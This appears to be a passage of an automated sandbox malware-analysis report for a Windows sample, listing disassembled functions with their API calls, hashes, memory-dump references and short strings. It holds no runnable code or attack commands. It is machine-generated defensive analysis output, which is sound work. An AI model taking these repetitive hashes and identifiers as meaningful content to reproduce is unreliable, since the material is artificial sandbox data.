                                        • Opcode ID: 14c2b375fd06834a604165357b8cf7fc7ee4f3968c609581954d0fc88aaaec25
                                        • Instruction ID: b73b0c439aefc2724b60f6b7fc37324a66d734b788d153eb5c26d9f8e345696d
                                        • Opcode Fuzzy Hash: 14c2b375fd06834a604165357b8cf7fc7ee4f3968c609581954d0fc88aaaec25
                                        • Instruction Fuzzy Hash: 80E06D31244280AEDB215B74BC8DBEC3F20FB12336F04831AF6FA580E1C37246409B20
                                        Function 00C5162B Relevance: 6.0, APIs: 4, Instructions: 22threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetCurrentThread.KERNEL32 ref: 00C51634
                                        • OpenThreadToken.ADVAPI32(00000000,?,?,?,00C511D9), ref: 00C5163B
                                        • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00C511D9), ref: 00C51648
                                        • OpenProcessToken.ADVAPI32(00000000,?,?,?,00C511D9), ref: 00C5164F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: CurrentOpenProcessThreadToken
                                        • String ID:
                                        • API String ID: 3974789173-0
                                        • Opcode ID: 6d6b8f2c8ea114c61ca6f769328dd5256c3fc9f82c5ddc40d7a1d1754150bd60
                                        • Instruction ID: b0c11a9704009dc9715d6de6aade8f5df70d5812c25ad7f230e91cdd2490363d
                                        • Opcode Fuzzy Hash: 6d6b8f2c8ea114c61ca6f769328dd5256c3fc9f82c5ddc40d7a1d1754150bd60
                                        • Instruction Fuzzy Hash: 07E08635601211DBD7201FB0AD8DB8A3B7CEF457D2F194808FA55CA090DB344585C778
                                        Function 00C4D858 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetDesktopWindow.USER32 ref: 00C4D858
                                        • GetDC.USER32(00000000), ref: 00C4D862
                                        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00C4D882
                                        • ReleaseDC.USER32(?), ref: 00C4D8A3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: CapsDesktopDeviceReleaseWindow
                                        • String ID:
                                        • API String ID: 2889604237-0
                                        • Opcode ID: a290cddafe088fc6029b0f3424163f0e4d3ae212e65e81686c957cc7ef79d8a9
                                        • Instruction ID: bf4056c9b0dced0bc7e031d2ba373b0a62a63638d07143cc7ef3468f5396bde0
                                        • Opcode Fuzzy Hash: a290cddafe088fc6029b0f3424163f0e4d3ae212e65e81686c957cc7ef79d8a9
                                        • Instruction Fuzzy Hash: 45E01AB4800205DFCB41AFB1D94876DFBB1FB08311F108059F91AE7250D7384945AF64
                                        Function 00C4D86C Relevance: 6.0, APIs: 4, Instructions: 18COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetDesktopWindow.USER32 ref: 00C4D86C
                                        • GetDC.USER32(00000000), ref: 00C4D876
                                        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00C4D882
                                        • ReleaseDC.USER32(?), ref: 00C4D8A3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: CapsDesktopDeviceReleaseWindow
                                        • String ID:
                                        • API String ID: 2889604237-0
                                        • Opcode ID: c47fec8f3600365eb9d2f4d574572108692a5e9aa3d0e9306dd49b710edb8b12
                                        • Instruction ID: 43601f1b6d3c4643480e50f8f466a6d23e5473367d7ed9bc738f9f2718793e14
                                        • Opcode Fuzzy Hash: c47fec8f3600365eb9d2f4d574572108692a5e9aa3d0e9306dd49b710edb8b12
                                        • Instruction Fuzzy Hash: 3CE012B4800204EFCB40AFB0E88876DFBB1BB08311B108058F91AE7250DB385905AF64
                                        Function 00C64D87 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00BF7620: _wcslen.LIBCMT ref: 00BF7625
                                        • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00C64ED4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Connection_wcslen
                                        • String ID: *$LPT
                                        • API String ID: 1725874428-3443410124
                                        • Opcode ID: a9db48f73f326e049677587c1fd732454f71b413b59dbfb067b4f805f278271f
                                        • Instruction ID: 793b84a269d98c27fd890abc362540a6d27fbbc6df5df0a50decbe58d391944b
                                        • Opcode Fuzzy Hash: a9db48f73f326e049677587c1fd732454f71b413b59dbfb067b4f805f278271f
                                        • Instruction Fuzzy Hash: 70915175A002049FCB28DF98C4D4EA9BBF1BF44304F158099E81A9F7A2D775EE85CB91
                                        Function 00C1E27D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                        Download Yara Rule
                                        APIs
                                        • __startOneArgErrorHandling.LIBCMT ref: 00C1E30D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: ErrorHandling__start
                                        • String ID: pow
                                        • API String ID: 3213639722-2276729525
                                        • Opcode ID: 864a546ba863e2d4662fc3beea44935c479c864749ebae46bb4396d9f62133f4
                                        • Instruction ID: 9efd62a08f875ebff9800a10580e576055ec4c249b6dfaee1e749cbeec088981
                                        • Opcode Fuzzy Hash: 864a546ba863e2d4662fc3beea44935c479c864749ebae46bb4396d9f62133f4
                                        • Instruction Fuzzy Hash: FF519E71A0C1129ACB157724D9813FE3B94AB01740F748A99E8F5C26F9DB348DC1BA46
                                        Function 00C0E187 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: #
                                        • API String ID: 0-1885708031
                                        • Opcode ID: be45ba6c070084ce9f279599bec06daf4fe43e537025337c021e4f2ac3203c79
                                        • Instruction ID: 5d8051546ac064cdc2367e6fd49be4da2dfa939cf10fda73b921460a65d33163
                                        • Opcode Fuzzy Hash: be45ba6c070084ce9f279599bec06daf4fe43e537025337c021e4f2ac3203c79
                                        • Instruction Fuzzy Hash: 3B512175940246DFDB15DF28C481ABE7BA8FF56320F254459ECA19B2D0D7349E42CBA0
                                        Function 00C0F291 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                        Download Yara Rule
                                        APIs
                                        • Sleep.KERNEL32(00000000), ref: 00C0F2A2
                                        • GlobalMemoryStatusEx.KERNEL32(?), ref: 00C0F2BB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: GlobalMemorySleepStatus
                                        • String ID: @
                                        • API String ID: 2783356886-2766056989
                                        • Opcode ID: b2f6188531d9bf148cd4dc5fd884944f76dab477c3a489581a6ea441dcb9613c
                                        • Instruction ID: c7730ab8ad7d3dbf70396a6eed3e092fd6c17b73ae583b2fdd527db27c52f234
                                        • Opcode Fuzzy Hash: b2f6188531d9bf148cd4dc5fd884944f76dab477c3a489581a6ea441dcb9613c
                                        • Instruction Fuzzy Hash: C45126714087499BD320AF14D886BAFFBE8FF85304F81489DF29942195EF30896DCB66
                                        Function 00C75745 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON
                                        Download Yara Rule
                                        APIs
                                        • CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 00C757E0
                                        • _wcslen.LIBCMT ref: 00C757EC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: BuffCharUpper_wcslen
                                        • String ID: CALLARGARRAY
                                        • API String ID: 157775604-1150593374
                                        • Opcode ID: 084170cc9fde4d910ee89857a5fbc95e5d2dc0d9c5842d2fc384c32135f16e0b
                                        • Instruction ID: 42181ac814f45107fbf1c09e18abccd0ab76478c03b85662d71965eeff57b5d7
                                        • Opcode Fuzzy Hash: 084170cc9fde4d910ee89857a5fbc95e5d2dc0d9c5842d2fc384c32135f16e0b
                                        • Instruction Fuzzy Hash: A841C171E001099FCB04DFA9C8819BEBBF5FF59364F10806DE519A7291E7709E81CBA1
                                        Function 00C6D0F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • _wcslen.LIBCMT ref: 00C6D130
                                        • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00C6D13A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: CrackInternet_wcslen
                                        • String ID: |
                                        • API String ID: 596671847-2343686810
                                        • Opcode ID: ed94fca91485c379aca0ad4829ce5786b7fafd945b5f70b5d16ec2fdfb40b9a3
                                        • Instruction ID: e76f84f0ab941ef7def5adef6940e496203d251e3d0cc0881554cae1d5654789
                                        • Opcode Fuzzy Hash: ed94fca91485c379aca0ad4829ce5786b7fafd945b5f70b5d16ec2fdfb40b9a3
                                        • Instruction Fuzzy Hash: 1B314D71D00209ABCF15EFA5CC85EEEBFB9FF05350F000059F919A6162E771AA5ADB60
                                        Function 00C8356C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON
                                        Download Yara Rule
                                        APIs
                                        • DestroyWindow.USER32(?,?,?,?), ref: 00C83621
                                        • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00C8365C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Window$DestroyMove
                                        • String ID: static
                                        • API String ID: 2139405536-2160076837
                                        • Opcode ID: a453b0b055fdc71591ec1b40419c0d43e657289a036fccb0d02857927f6486a6
                                        • Instruction ID: 3c564f7fcac28fefafd16b241db1aad7c9bcca2a8631bcecad7b2e9f3577fbd6
                                        • Opcode Fuzzy Hash: a453b0b055fdc71591ec1b40419c0d43e657289a036fccb0d02857927f6486a6
                                        • Instruction Fuzzy Hash: 53318F71110644AADB10EF28DC80FFB73A9FF48B28F10961DF9A597290DA30AD91D768
                                        Function 00C84537 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00C8461F
                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00C84634
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID: '
                                        • API String ID: 3850602802-1997036262
                                        • Opcode ID: 58c0bf4cb8585c487884738a1fba47b65a55aa863543622ba01e1781bbd0bc85
                                        • Instruction ID: 3d9e1262fb6c64a45d0854d54a92904fda9624beb2dbd5d6e096414175d83f18
                                        • Opcode Fuzzy Hash: 58c0bf4cb8585c487884738a1fba47b65a55aa863543622ba01e1781bbd0bc85
                                        • Instruction Fuzzy Hash: ED3138B4A0030A9FDB18DFA9C980BDE7BB5FF09304F14406AE904AB341E770AA41CF94
                                        Function 00C831EF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00C8327C
                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00C83287
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID: Combobox
                                        • API String ID: 3850602802-2096851135
                                        • Opcode ID: 739588a00058e5d55be2ccf43e5e422dbdc2817843629d77b81c1a69f5f7543c
                                        • Instruction ID: 1dafb10aa1413c6a2204a7d56425ff8cd8708dccddc22d33163c915db9cdbd4d
                                        • Opcode Fuzzy Hash: 739588a00058e5d55be2ccf43e5e422dbdc2817843629d77b81c1a69f5f7543c
                                        • Instruction Fuzzy Hash: D911E2713002487FEF21AE54DC80FBB376AEB94768F101228F92897292D631AE518764
                                        Function 00C83710 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00BF600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00BF604C
                                          • Part of subcall function 00BF600E: GetStockObject.GDI32(00000011), ref: 00BF6060
                                          • Part of subcall function 00BF600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 00BF606A
                                        • GetWindowRect.USER32(00000000,?), ref: 00C8377A
                                        • GetSysColor.USER32(00000012), ref: 00C83794
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Window$ColorCreateMessageObjectRectSendStock
                                        • String ID: static
                                        • API String ID: 1983116058-2160076837
                                        • Opcode ID: 1583a81fb40189bf1257e45f51f3f902adf898ad6d3193c4026d62ebc95db900
                                        • Instruction ID: f08380e374be78e4e506e5e0f804627e340e18cbe26ecf7e2509acc838ebd800
                                        • Opcode Fuzzy Hash: 1583a81fb40189bf1257e45f51f3f902adf898ad6d3193c4026d62ebc95db900
                                        • Instruction Fuzzy Hash: 9E1159B2610209AFDF00EFA8CC45EFE7BB8EB08308F005524FD65E2250E734E9109B60
                                        Function 00C6CD1E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00C6CD7D
                                        • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00C6CDA6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Internet$OpenOption
                                        • String ID: <local>
                                        • API String ID: 942729171-4266983199
                                        • Opcode ID: b5c03eeda29ff263acfbd48c2b5d09d5a2587ea353bf130ee3192266abd8210b
                                        • Instruction ID: abcf164a751b3d454848de318ccff305f96f74dc60a7e754d95ed7df78063859
                                        • Opcode Fuzzy Hash: b5c03eeda29ff263acfbd48c2b5d09d5a2587ea353bf130ee3192266abd8210b
                                        • Instruction Fuzzy Hash: B411A071205631BAD7385B66CCC9FF7BEA8EB127A4F00422AF19982080D6749954D6F0
                                        Function 00C83429 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetWindowTextLengthW.USER32(00000000), ref: 00C834AB
                                        • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00C834BA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: LengthMessageSendTextWindow
                                        • String ID: edit
                                        • API String ID: 2978978980-2167791130
                                        • Opcode ID: 7ba17cc64cf2a16271205dbdc47ea606028265c67a83fd394d982370cef33833
                                        • Instruction ID: ab4ea51cbbb6b0f8202e8ba619fdc28f8896cc75a19fa924810e02f8df9be077
                                        • Opcode Fuzzy Hash: 7ba17cc64cf2a16271205dbdc47ea606028265c67a83fd394d982370cef33833
                                        • Instruction Fuzzy Hash: 1511DD31100108AAEB12AE64DC84BBB3B6AEF81B78F505324F930931D0C731DE519B68
                                        Function 00C56C86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00BF9CB3: _wcslen.LIBCMT ref: 00BF9CBD
                                        • CharUpperBuffW.USER32(?,?,?), ref: 00C56CB6
                                        • _wcslen.LIBCMT ref: 00C56CC2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: _wcslen$BuffCharUpper
                                        • String ID: STOP
                                        • API String ID: 1256254125-2411985666
                                        • Opcode ID: 5ad1353451c7ebae83d0d8842dce156d0aa013bc74b76988fe60bbff6a06488a
                                        • Instruction ID: b7a01544dd14d377ed8c6c6460b7df461c260af6b319f9ede6bdc68dfbc2e277
                                        • Opcode Fuzzy Hash: 5ad1353451c7ebae83d0d8842dce156d0aa013bc74b76988fe60bbff6a06488a
                                        • Instruction Fuzzy Hash: EF01C43661052A8ACB219FFDDC809BF77B5EB61721B900924EC6297190FA31EA88C654
                                        Function 00C51CDE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00BF9CB3: _wcslen.LIBCMT ref: 00BF9CBD
                                          • Part of subcall function 00C53CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00C53CCA
                                        • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00C51D4C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: ClassMessageNameSend_wcslen
                                        • String ID: ComboBox$ListBox
                                        • API String ID: 624084870-1403004172
